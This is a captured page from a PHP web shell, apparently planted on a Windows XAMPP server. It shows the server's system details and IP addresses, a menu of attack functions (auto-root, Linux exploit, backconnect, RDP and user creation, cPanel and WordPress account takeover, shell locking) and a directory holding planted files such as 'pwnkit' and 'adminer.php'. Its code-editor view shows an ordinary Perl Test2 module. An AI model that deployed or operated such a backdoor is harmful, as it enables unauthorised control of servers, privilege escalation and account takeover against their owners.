Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.183
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
perl /
vendor /
lib /
Test2 /
Tools /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
AsyncSubtest.pm
3.71
KB
-rw-rw-rw-
Basic.pm
6.9
KB
-rw-rw-rw-
Class.pm
4.73
KB
-rw-rw-rw-
ClassicCompare.pm
11.78
KB
-rw-rw-rw-
Compare.pm
45.74
KB
-rw-rw-rw-
Defer.pm
3.32
KB
-rw-rw-rw-
Encoding.pm
1.54
KB
-rw-rw-rw-
Event.pm
1.72
KB
-rw-rw-rw-
Exception.pm
3.63
KB
-rw-rw-rw-
Exports.pm
3.89
KB
-rw-rw-rw-
GenTemp.pm
2.4
KB
-rw-rw-rw-
Grab.pm
2.49
KB
-rw-rw-rw-
Mock.pm
12.59
KB
-rw-rw-rw-
Ref.pm
3.62
KB
-rw-rw-rw-
Spec.pm
16.28
KB
-rw-rw-rw-
Subtest.pm
3.67
KB
-rw-rw-rw-
Target.pm
1.99
KB
-rw-rw-rw-
Tester.pm
6.17
KB
-rw-rw-rw-
Warnings.pm
2.87
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Exception.pm
package Test2::Tools::Exception; use strict; use warnings; our $VERSION = '0.000139'; use Test2::API qw/context/; our @EXPORT = qw/dies lives try_ok/; use base 'Exporter'; sub dies(&) { my $code = shift; local ($@, $!, $?); my $ok = eval { $code->(); 1 }; my $err = $@; return undef if $ok; unless ($err) { my $ctx = context(); $ctx->alert("Got exception as expected, but exception is falsy (undef, '', or 0)..."); $ctx->release; } return $err; } sub lives(&) { my $code = shift; my $err; { local ($@, $!, $?); eval { $code->(); 1 } and return 1; $err = $@; } # If the eval failed we want to set $@ to the error. $@ = $err; return 0; } sub try_ok(&;$) { my ($code, $name) = @_; my $ok = &lives($code); my $err = $@; # Context should be obtained AFTER code is run so that events inside the # codeblock report inside the codeblock itself. This will also preserve $@ # as thrown inside the codeblock. my $ctx = context(); chomp(my $diag = "Exception: $err"); $ctx->ok($ok, $name, [$diag]); $ctx->release; $@ = $err unless $ok; return $ok; } 1; __END__ =pod =encoding UTF-8 =head1 NAME Test2::Tools::Exception - Test2 based tools for checking exceptions =head1 DESCRIPTION This is the L<Test2> implementation of code used to test exceptions. This is similar to L<Test::Fatal>, but it intentionally does much less. =head1 SYNOPSIS use Test2::Tools::Exception qw/dies lives/; like( dies { die 'xxx' }, qr/xxx/, "Got exception" ); ok(lives { ... }, "did not die") or note($@); =head1 EXPORTS All subs are exported by default. =over 4 =item $e = dies { ... } This will trap any exception the codeblock throws. If no exception is thrown the sub will return undef. If an exception is thrown it will be returned. This function preserves C<$@>, it will not be altered from its value before the sub is called. =item $bool = lives { ... } This will trap any exception thrown in the codeblock. It will return true when there is no exception, and false when there is. C<$@> is preserved from before the sub is called when there is no exception. When an exception is trapped C<$@> will have the exception so that you can look at it. =item $bool = try_ok { ... } =item $bool = try_ok { ... } "Test Description" This will run the code block trapping any exception. If there is no exception a passing event will be issued. If the test fails a failing event will be issued, and the exception will be reported as diagnostics. B<Note:> This function does not preserve C<$@> on failure, it will be set to the exception the codeblock throws, this is by design so that you can obtain the exception if desired. =back =head1 DIFFERENCES FROM TEST::FATAL L<Test::Fatal> sets C<$Test::Builder::Level> such that failing tests inside the exception block will report to the line where C<exception()> is called. I disagree with this, and think the actual line of the failing test is more important. Ultimately, though L<Test::Fatal> cannot be changed, people probably already depend on that behavior. =head1 SOURCE The source code repository for Test2-Suite can be found at F<https://github.com/Test-More/Test2-Suite/>. =head1 MAINTAINERS =over 4 =item Chad Granum E<lt>exodist@cpan.orgE<gt> =back =head1 AUTHORS =over 4 =item Chad Granum E<lt>exodist@cpan.orgE<gt> =back =head1 COPYRIGHT Copyright 2018 Chad Granum E<lt>exodist@cpan.orgE<gt>. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself. See F<http://dev.perl.org/licenses/> =cut
Close